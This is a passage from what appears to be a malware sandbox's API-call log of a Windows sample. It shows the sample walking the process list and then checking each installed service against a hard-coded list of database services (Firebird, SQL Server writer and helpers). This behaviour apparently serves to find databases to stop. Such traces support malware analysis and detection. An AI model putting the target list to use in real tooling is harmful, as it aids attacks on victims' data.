th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.541] lstrlenW (lpString="svchost.exe") returned 11 [0308.541] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.542] lstrlenW (lpString="svchost.exe") returned 11 [0308.542] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.543] lstrlenW (lpString="spoolsv.exe") returned 11 [0308.543] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.543] lstrlenW (lpString="svchost.exe") returned 11 [0308.543] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.544] lstrlenW (lpString="audiodg.exe") returned 11 [0308.544] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0308.544] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0308.544] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0308.545] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0308.545] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0308.546] lstrlenW (lpString="Memory Compression") returned 18 [0308.546] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0308.546] lstrlenW (lpString="sihost.exe") returned 10 [0308.547] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.547] lstrlenW (lpString="svchost.exe") returned 11 [0308.547] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0308.548] lstrlenW (lpString="taskhostw.exe") returned 13 [0308.548] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.549] lstrlenW (lpString="explorer.exe") returned 12 [0308.549] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0308.549] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0308.549] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0308.550] lstrlenW (lpString="SearchUI.exe") returned 12 [0308.550] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0308.550] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0308.550] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.551] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0308.551] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0308.552] lstrlenW (lpString="wdgmug.exe") returned 10 [0308.552] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0308.552] lstrlenW (lpString="cmd.exe") returned 7 [0308.552] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0308.553] lstrlenW (lpString="conhost.exe") returned 11 [0308.553] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0308.553] CloseHandle (hObject=0x420) returned 1 [0308.553] Sleep (dwMilliseconds=0x1f4) [0309.116] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a300 [0309.116] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0309.117] GetLastError () returned 0xea [0309.117] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0309.118] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0309.119] CloseServiceHandle (hSCObject=0x401a300) returned 1 [0309.119] lstrlenW (lpString="Appinfo") returned 7 [0309.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0309.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0309.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0309.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0309.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0309.120] lstrlenW (lpString="AppXSvc") returned 7 [0309.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0309.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0309.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0309.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0309.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0309.120] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0309.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0309.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0309.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0309.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0309.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0309.120] lstrlenW (lpString="Audiosrv") returned 8 [0309.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0309.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0309.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0309.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0309.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0309.121] lstrlenW (lpString="BFE") returned 3 [0309.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0309.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0309.121] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0309.121] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0309.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0309.121] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0309.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0309.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0309.121] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0309.121] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0309.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0309.122] lstrlenW (lpString="CDPSvc") returned 6 [0309.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0309.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0309.122] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0309.122] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0309.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0309.122] lstrlenW (lpString="ClickToRunSvc") returned 13 [0309.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0309.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0309.122] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0309.122] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0309.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0309.122] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0309.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0309.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0309.123] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0309.123] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0309.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0309.123] lstrlenW (lpString="CryptSvc") returned 8 [0309.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0309.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0309.123] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0309.123] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0309.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0309.123] lstrlenW (lpString="DcomLaunch") returned 10 [0309.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0309.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0309.123] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0309.123] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0309.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0309.123] lstrlenW (lpString="DeviceAssociationService") returned 24 [0309.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0309.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0309.124] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0309.124] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0309.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0309.124] lstrlenW (lpString="Dhcp") returned 4 [0309.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0309.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0309.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0309.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0309.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0309.124] lstrlenW (lpString="Dnscache") returned 8 [0309.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0309.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0309.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0309.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0309.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0309.125] lstrlenW (lpString="DPS") returned 3 [0309.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0309.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0309.125] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0309.125] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0309.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0309.125] lstrlenW (lpString="DusmSvc") returned 7 [0309.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0309.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0309.125] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0309.125] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0309.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0309.125] lstrlenW (lpString="EventLog") returned 8 [0309.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0309.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0309.125] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0309.125] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0309.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0309.125] lstrlenW (lpString="EventSystem") returned 11 [0309.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0309.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0309.125] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0309.125] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0309.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0309.126] lstrlenW (lpString="FontCache") returned 9 [0309.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0309.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0309.126] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0309.126] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0309.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0309.126] lstrlenW (lpString="gpsvc") returned 5 [0309.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0309.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0309.126] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0309.126] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0309.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0309.126] lstrlenW (lpString="iphlpsvc") returned 8 [0309.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0309.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0309.126] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0309.126] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0309.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0309.126] lstrlenW (lpString="KeyIso") returned 6 [0309.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0309.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0309.126] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0309.126] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0309.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0309.126] lstrlenW (lpString="LanmanServer") returned 12 [0309.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0309.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0309.127] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0309.127] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0309.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0309.127] lstrlenW (lpString="LanmanWorkstation") returned 17 [0309.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0309.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0309.127] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0309.127] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0309.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0309.127] lstrlenW (lpString="lfsvc") returned 5 [0309.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0309.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0309.127] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0309.127] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0309.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0309.127] lstrlenW (lpString="lmhosts") returned 7 [0309.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0309.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0309.127] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0309.127] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0309.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0309.127] lstrlenW (lpString="LSM") returned 3 [0309.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0309.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0309.128] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0309.128] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0309.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0309.128] lstrlenW (lpString="MpsSvc") returned 6 [0309.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0309.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0309.128] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0309.128] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0309.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0309.128] lstrlenW (lpString="NcbService") returned 10 [0309.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0309.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0309.128] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0309.128] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0309.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0309.128] lstrlenW (lpString="netprofm") returned 8 [0309.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0309.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0309.128] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0309.128] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0309.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0309.128] lstrlenW (lpString="NgcSvc") returned 6 [0309.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0309.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0309.128] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0309.128] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0309.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0309.129] lstrlenW (lpString="NlaSvc") returned 6 [0309.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0309.129] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0309.129] lstrlenW (lpString="nsi") returned 3 [0309.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0309.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0309.129] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0309.129] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0309.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0309.129] lstrlenW (lpString="PcaSvc") returned 6 [0309.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0309.129] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0309.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0309.129] lstrlenW (lpString="PlugPlay") returned 8 [0309.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0309.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0309.129] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0309.129] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0309.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0309.129] lstrlenW (lpString="Power") returned 5 [0309.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0309.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0309.130] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0309.130] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0309.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0309.130] lstrlenW (lpString="ProfSvc") returned 7 [0309.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0309.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0309.130] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0309.130] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0309.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0309.130] lstrlenW (lpString="RpcEptMapper") returned 12 [0309.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0309.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0309.130] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0309.130] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0309.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0309.130] lstrlenW 